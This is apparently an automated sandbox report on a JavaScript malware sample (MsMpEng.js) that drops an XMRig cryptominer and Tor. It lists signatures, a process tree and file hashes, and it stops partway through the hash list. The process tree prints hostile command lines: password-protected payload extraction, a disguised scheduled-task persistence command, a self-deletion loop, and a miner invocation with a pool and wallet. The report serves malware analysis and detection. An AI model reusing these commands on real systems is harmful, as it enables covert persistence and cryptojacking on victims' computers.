Resubmissions

09-04-2024 13:34

240409-qvlrtabe9s 10

09-04-2024 13:34

240409-qvk6aabe81 10

09-04-2024 13:33

240409-qthzjabe5z 10

09-04-2024 13:33

240409-qthc1abe5y 10

07-07-2023 11:45

230707-nw632ahf6w 10

Analysis

  • max time kernel
    299s
  • max time network
    303s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-04-2024 10:31

General

  • Target

    MsMpEng.js

  • Size

    24.2MB

  • MD5

    690d57b0d8670391bad0876cae078bab

  • SHA1

    32bea01d606128c606b71e19920099c6cb15030f

  • SHA256

    b27dd5407a22c8df93090fbc1a3eb93c6461f4a279cfabd87b4b21e246bda458

  • SHA512

    dd113765cd5cfeb99a98775c3c8e265463fca7863ffa519dcb7175312bbbeb4ea24ca45b4cef0320b430d413c020970346f4db671e0730e9e044cd2585f71fd4

  • SSDEEP

    49152:34aSO/UYGzBMZ09d1X5EdS76+B0RX8DQQs8ReDlpgU3HApVeOGMmb5cUNWcGTRPk:H

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 7 IoCs
  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\MsMpEng.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Users\Admin\AppData\Local\Temp\x.exe
      "C:\Users\Admin\AppData\Local\Temp\x.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
        C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:220
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2564
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
          4⤵
          • Creates scheduled task(s)
          PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\x.exe"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\x.exe" exit)
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4692
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:2288
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:1760
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:2056
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:4836
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:3052
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:1732
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:3428
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:2612
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:1812
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
          • Delays execution with timeout.exe
          PID:4140
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 0
          4⤵
            PID:536
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 0
            4⤵
            • Delays execution with timeout.exe
            PID:3348
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 0
            4⤵
              PID:2456
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 0
              4⤵
              • Delays execution with timeout.exe
              PID:4460
            • C:\Windows\SysWOW64\timeout.exe
              timeout /t 0
              4⤵
                PID:1480
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 0
                4⤵
                • Delays execution with timeout.exe
                PID:400
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 0
                4⤵
                • Delays execution with timeout.exe
                PID:792
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 0
                4⤵
                  PID:4952
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 0
                  4⤵
                  • Delays execution with timeout.exe
                  PID:8
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 0
                  4⤵
                  • Delays execution with timeout.exe
                  PID:1952
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 0
                  4⤵
                  • Delays execution with timeout.exe
                  PID:4292
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 0
                  4⤵
                  • Delays execution with timeout.exe
                  PID:2932
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 0
                  4⤵
                  • Delays execution with timeout.exe
                  PID:4380
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 0
                  4⤵
                  • Delays execution with timeout.exe
                  PID:4788
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 0
                  4⤵
                    PID:1820
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 0
                    4⤵
                      PID:3056
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 0
                      4⤵
                        PID:1960
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 0
                        4⤵
                        • Delays execution with timeout.exe
                        PID:2396
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 0
                        4⤵
                          PID:3944
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /t 0
                          4⤵
                            PID:2436
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout /t 0
                            4⤵
                              PID:4308
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 0
                              4⤵
                                PID:4356
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 0
                                4⤵
                                • Delays execution with timeout.exe
                                PID:1640
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 0
                                4⤵
                                • Delays execution with timeout.exe
                                PID:688
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 0
                                4⤵
                                • Delays execution with timeout.exe
                                PID:3012
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 0
                                4⤵
                                • Delays execution with timeout.exe
                                PID:4060
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 0
                                4⤵
                                • Delays execution with timeout.exe
                                PID:1576
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 0
                                4⤵
                                • Delays execution with timeout.exe
                                PID:1556
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 0
                                4⤵
                                • Delays execution with timeout.exe
                                PID:4232
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 0
                                4⤵
                                  PID:3908
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:4544
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:1452
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:2992
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:4116
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:5116
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:2588
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:2896
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:3932
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:3432
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:2580
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:4696
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 0
                                  4⤵
                                    PID:3364
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 0
                                    4⤵
                                    • Delays execution with timeout.exe
                                    PID:2404
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 0
                                    4⤵
                                      PID:4188
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 0
                                      4⤵
                                      • Delays execution with timeout.exe
                                      PID:3724
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 0
                                      4⤵
                                      • Delays execution with timeout.exe
                                      PID:2308
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 0
                                      4⤵
                                      • Delays execution with timeout.exe
                                      PID:2816
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 0
                                      4⤵
                                        PID:1848
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 0
                                        4⤵
                                        • Delays execution with timeout.exe
                                        PID:4840
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 0
                                        4⤵
                                          PID:4000
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 0
                                          4⤵
                                          • Delays execution with timeout.exe
                                          PID:3112
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 0
                                          4⤵
                                          • Delays execution with timeout.exe
                                          PID:2724
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 0
                                          4⤵
                                          • Delays execution with timeout.exe
                                          PID:3596
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 0
                                          4⤵
                                            PID:3492
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 0
                                            4⤵
                                            • Delays execution with timeout.exe
                                            PID:4228
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 0
                                            4⤵
                                            • Delays execution with timeout.exe
                                            PID:60
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 0
                                            4⤵
                                              PID:220
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 0
                                              4⤵
                                                PID:412
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 0
                                                4⤵
                                                • Delays execution with timeout.exe
                                                PID:1512
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 0
                                                4⤵
                                                • Delays execution with timeout.exe
                                                PID:2732
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 0
                                                4⤵
                                                  PID:2564
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 0
                                                  4⤵
                                                  • Delays execution with timeout.exe
                                                  PID:3928
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 0
                                                  4⤵
                                                  • Delays execution with timeout.exe
                                                  PID:4920
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 0
                                                  4⤵
                                                  • Delays execution with timeout.exe
                                                  PID:4944
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 0
                                                  4⤵
                                                  • Delays execution with timeout.exe
                                                  PID:4736
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 0
                                                  4⤵
                                                  • Delays execution with timeout.exe
                                                  PID:2860
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 0
                                                  4⤵
                                                  • Delays execution with timeout.exe
                                                  PID:3780
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 0
                                                  4⤵
                                                    PID:5088
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 0
                                                    4⤵
                                                    • Delays execution with timeout.exe
                                                    PID:3524
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 0
                                                    4⤵
                                                    • Delays execution with timeout.exe
                                                    PID:4924
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 0
                                                    4⤵
                                                    • Delays execution with timeout.exe
                                                    PID:700
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 0
                                                    4⤵
                                                      PID:1760
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 0
                                                      4⤵
                                                      • Delays execution with timeout.exe
                                                      PID:2056
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 0
                                                      4⤵
                                                      • Delays execution with timeout.exe
                                                      PID:4836
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout /t 0
                                                      4⤵
                                                        PID:3052
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 0
                                                        4⤵
                                                        • Delays execution with timeout.exe
                                                        PID:1732
                                                      • C:\Windows\SysWOW64\timeout.exe
                                                        timeout /t 0
                                                        4⤵
                                                          PID:3428
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 0
                                                          4⤵
                                                          • Delays execution with timeout.exe
                                                          PID:1768
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
                                                    1⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:3012
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
                                                      2⤵
                                                      • Checks computer location settings
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • NTFS ADS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:2740
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
                                                        7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3940
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:644
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
                                                        7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1784
                                                      • C:\Windows\System32\attrib.exe
                                                        -a RandomX -o stratum+tcp://xmr.2miners.com:2222 -u 8BayjhYeujm9whuyNMsrd46tWdEd4JfAPfq6nXn1S4zrLzB9dduLbPuFPb3M2ZRFtfa6Zugfv5643AuBbmP8PDHaS3hQDdi.fhaw -p x -t 6
                                                        3⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Views/modifies file attributes
                                                        PID:1420
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
                                                    1⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:3944
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck28314
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:1552
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:1572
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:4208

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Temp\32.exe

                                                    Filesize

                                                    7.4MB

                                                    MD5

                                                    7f9e6ee81558b38fbe276f60949d38b9

                                                    SHA1

                                                    6358b944b0515b04da8fe7fda7dc3dbbfb82423c

                                                    SHA256

                                                    6cd0a0976cff64c5287c166b73e5c877f026274f85599344756c47e9aa756bcb

                                                    SHA512

                                                    960966cc6254f15d5653ec9dbfe0fdc6725f2c1209b4ddb8b1c68d8f646521340f91029a53a5c8c60c9f813f3fe3e83644b052913178ac75886ccbd894be9ce3

                                                  • C:\Users\Admin\AppData\Local\Temp\64.exe

                                                    Filesize

                                                    8.4MB

                                                    MD5

                                                    a2a5a9b937771a4b82694c844fd27e36

                                                    SHA1

                                                    402e2f7bfe1f24d6ea048d58bf156676132f515d

                                                    SHA256

                                                    390126ab71cd12f414f4200cc246d5283c534ab216794ce9980048779960ea68

                                                    SHA512

                                                    d352b147c8f045f9931725d25166916ce081ac5cf251f2987fb011deed2e8d3e08f91dbce8a2464abab5561b7915d69cbb7a0d02437b30b6fd3d5622621149e1

                                                  • C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt

                                                    Filesize

                                                    722KB

                                                    MD5

                                                    43141e85e7c36e31b52b22ab94d5e574

                                                    SHA1

                                                    cfd7079a9b268d84b856dc668edbb9ab9ef35312

                                                    SHA256

                                                    ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d

                                                    SHA512

                                                    9119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc

                                                  • C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt

                                                    Filesize

                                                    14.6MB

                                                    MD5

                                                    cfe4b8f7535c958ea26cde6f32b559aa

                                                    SHA1

                                                    253ba3372c6c0b1c301f6e968c4fb7d5ffd696d0

                                                    SHA256

                                                    0afc8b7c47f48ef991535d435d48411ea12c4b98f14253a27b15ec6d7f020620

                                                    SHA512

                                                    01e8862cb7c1a3b247d09ca8e9f94c40232aaed93ab9f1937de0f69f83ba3d32926b6289b7bc5b8ae2bb06876b915a50ed65bb8ba10ffadcbbee579ce968bd39

                                                  • C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml

                                                    Filesize

                                                    2KB

                                                    MD5

                                                    9160347bec74471e1a79edfd950629ae

                                                    SHA1

                                                    c149a7e5aab6e349a70b7b458d0eaaa9d301c790

                                                    SHA256

                                                    0fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab

                                                    SHA512

                                                    b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358

                                                  • C:\Users\Admin\AppData\Local\Temp\aut3393.tmp

                                                    Filesize

                                                    14.6MB

                                                    MD5

                                                    2380aed7f261148fdb35af6688e408ee

                                                    SHA1

                                                    fa359778d16c934ba96b96f3c6c17a10a9e266b0

                                                    SHA256

                                                    12afa4813940c6985259f487d5e2892550596a60c6c77f806aefa2c254c74bb4

                                                    SHA512

                                                    646bdbc4f01991460755c6a2c2dbbca0a0170c83d06050ba50ec1b5406d58f8035498c84462dd9e6ab1d695b8854e2f4734d64ec2f4ab1083371fd145963bb85

                                                  • C:\Users\Admin\AppData\Local\Temp\x.exe

                                                    Filesize

                                                    18.1MB

                                                    MD5

                                                    efcd72ad2d3430248a68e5f960ed5e2b

                                                    SHA1

                                                    58cc7d2732f401b99926211c0dab319dfc0bba1a

                                                    SHA256

                                                    41686ad9f581037f44b72b37f8bee562512854fc6807c5a13ea1646cdeab61c8

                                                    SHA512

                                                    d50dd3628e0ed5b6040545e1a1836ffcdde30c4748b220efb7df29aa139b22b814d2466d6808c8dc3af765b9ce8092582720f69187a6562eefd6fca4cb9670e5

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

                                                    Filesize

                                                    12KB

                                                    MD5

                                                    dd891fddd85ccc7069c2257776ab9e67

                                                    SHA1

                                                    44f07c9bb076d96a2ecca8c7797cfa3704bc0456

                                                    SHA256

                                                    36e32da593099e3281bbcc46bf3e8cd5c4d4a126e64d34b7feef490472d3daa6

                                                    SHA512

                                                    de9e2b80ec184680b569b7141444c60ed57ed4a47f03ae204116874e96e6be23ee4c2b9f22b1d89d061e16c12e0998cec2d5731bc38ddeb7132836f6f9155a54

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

                                                    Filesize

                                                    2.6MB

                                                    MD5

                                                    21e3778b11e03ced442a1ac73d8949ee

                                                    SHA1

                                                    9e416a029a3c6e6738cba0d1f69253ca283b73ea

                                                    SHA256

                                                    03b7f47481eaf1f2c942f4a41a3a6411e22493c2d5b25ab1cab38ffe11cccb76

                                                    SHA512

                                                    20b91dea4e9f8f9dc8b672be51fb161f1b7a60fac9523921bc084f64c684f688070ec0e01c93f57294a7b13f5ecd33f9eac0eb22acd65b528162bfb08d0bd1a9

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.txt

                                                    Filesize

                                                    15.8MB

                                                    MD5

                                                    7268eb05d51294219569569ea006da2a

                                                    SHA1

                                                    ade2c0a248f6aae9ff00f42e04dd3d1de242b289

                                                    SHA256

                                                    188b7e3f0135cf683c393ab88930e93f29d4a0c31c08841237afaf543ecb2e12

                                                    SHA512

                                                    0056df445e950fc3a76dcb64c4ab8c8b187436d18e95b916b7e83e7e215fa8371bae91501252b1a6e15dbc5414ae674381b758c84a2814d4c88bd856e3deef46

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp

                                                    Filesize

                                                    2.5MB

                                                    MD5

                                                    54183220aa6c777f8228474ff5b5df01

                                                    SHA1

                                                    ed438f17bffb37d42afd61d8dcef0c50d554c65c

                                                    SHA256

                                                    9a78c80e93bd1ed3d71eb090465e39a69470cd1812fc5e169d8b412e8c665963

                                                    SHA512

                                                    70b1e22449c5264bed46b62595206e3ad36e2a9c33fa9589acb792d499dcbbae5ebdbf3b35c140e72a7d594f807a6ce1ab925736b5e1a07c17a26445a2591987

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-certs

                                                    Filesize

                                                    20KB

                                                    MD5

                                                    9fc3e459174793b4b8494a5e05036b57

                                                    SHA1

                                                    d69b0a4f4378b63ae61acd4595b65439097bf0b6

                                                    SHA256

                                                    d6b976ee0f35a55928c29b84df31c88f98e2714ca7fbe08c8dadec7164acf946

                                                    SHA512

                                                    9775f1645ba59dfaa1ea59802abafd3deeb6bbe60ea89412c5a7664ce1cf006c4807a9192558b5aec10322008256c740411a8b3801c71e7917263dfebd3fc9f4

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdesc-consensus.tmp

                                                    Filesize

                                                    2.7MB

                                                    MD5

                                                    ffcd5cbca9867eee8d74446c60ea6736

                                                    SHA1

                                                    1a14d9829b9ec3b18adbdca0f87df2fd34938992

                                                    SHA256

                                                    2089eed082364ed1e52980737b55c54c434f42fdf5048077b63e0dc5ee8e69c3

                                                    SHA512

                                                    e11ed7aab2389008bb02ed33cffaeeab18799acc1ebdecc9a84edc190a55dda41aa5543cc5d7a784e966cb3ab93973fe81a1b94db89e3600fff9017db083b6fb

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\cached-microdescs.new

                                                    Filesize

                                                    20.4MB

                                                    MD5

                                                    c7944dc239b1db3204f5a58e195b3056

                                                    SHA1

                                                    74fbc3711ef61079cbd8c9c94bdb1037b70f72cf

                                                    SHA256

                                                    aef73141c53aec33ee4c73c60a50713b6374865630d2ef28b3f241cdaf8c7b4e

                                                    SHA512

                                                    f764b0b84c1cb067856fc78718a3f721a70228519c9f32c1e655748292a8f6943d6e9493549fbc717a789c406bde1e58456463b0c9af97d52c8e42f816899eb5

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorDataSocksListenAddress 127.0.0.1\state

                                                    Filesize

                                                    3KB

                                                    MD5

                                                    784c116d7514e3ad06dce49d6b6f4a70

                                                    SHA1

                                                    44605fd988ff7a2b8a199b0271cc3172d6ebd2f5

                                                    SHA256

                                                    1afdc58f12ee3dc1e79ef76652158361a458256610a59a8be1e066d00bad0485

                                                    SHA512

                                                    c640bf411fe245eb43bf3ff40163e6ec99f633cfc786b9fb53c17ddce3c130e0e3ff7c00f7ad90e2f5bcba1db01d46c669ee64f49041eee896d807e509fd3a0f

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\Tor.pid

                                                    Filesize

                                                    5B

                                                    MD5

                                                    9dd0e0b56624d89677dbd439cacda916

                                                    SHA1

                                                    d428b2e25e28aa60d889aee9b88523dec3edd307

                                                    SHA256

                                                    82ec522268de22bebde83d0a2bc91e2f5626c3ba7980a3ca5717f3df15aa5cd5

                                                    SHA512

                                                    2f54d70027b503aa91b346f6523269bc150a134a57bcb2968ecdcb39554d2ced06007d143921f4ed91ceee7e281e426a2af38e7d1399988201e91bd206cb9267

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\TorData\TorConfig

                                                    Filesize

                                                    201B

                                                    MD5

                                                    b9d2fe9cfa840518fa39039c928d4938

                                                    SHA1

                                                    0561516b7cfa784cf400349983817c8b18817256

                                                    SHA256

                                                    69d57bfb46ef8097c1cfca65885790421d0e0965b7778f165cd7df9368807776

                                                    SHA512

                                                    894510d39a044a37325d73b8348860960b3a78c54e7cdf81357f4b50e8dcf5d47ab98c768e6439949ba835802b2a5e98314441127d9655b027caf246e09e013d

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libcrypto-1_1-x64.dll

                                                    Filesize

                                                    3.4MB

                                                    MD5

                                                    791a48e7cf84ec1532d20127556f6300

                                                    SHA1

                                                    774f71e595cfc7e24dc941839566bc9edd9156c5

                                                    SHA256

                                                    af682ad107cf0e9d9f11adeaf88f817610988b56577c4020897debc0f98e26ff

                                                    SHA512

                                                    ecbb4a07bb68fec5258be0adc91b89d179b5668bbab3be3bd72d5339f8bf3b32a1860b38693a304029fe989bd92adb020cf755f673b1e59966dfc75e4f958cfa

                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\libevent-2-1-7.dll

                                                    Filesize

                                                    974KB

                                                    MD5

                                                    be51ba4bea2d731dacf974c43941e457

                                                    SHA1

